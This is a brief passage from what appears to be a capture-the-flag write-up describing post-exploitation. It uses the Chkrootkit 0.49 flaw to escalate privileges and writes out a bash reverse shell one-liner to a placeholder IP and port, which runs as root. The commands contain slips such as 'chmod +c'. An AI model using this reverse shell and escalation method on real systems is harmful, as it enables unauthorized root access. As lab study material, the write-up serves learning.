Post Exploitation

Running LinEnum, there was only one thing that stood out.

Port 22 appears to be open, even though it was closed in our nmap. This can be exploited by port knocking.

Chkrootkit 0.49 - Local Privilege EscalationExploit Database

After reading the above, chroot will execute files in the /tmp directory. We have to create an executable and that we want to run in that directory. We do so with the following command.

root@kali~$: echo "/bin/bash -c 'bash -i >& /dev/tcp/[ip]/[port] 0>&1'" > update
root@kali~$: chmod +c

Creating our listener and waiting a bit, we eventually get a root shell.

PreviousExploitation NextLessons learned

Last updated 5 years ago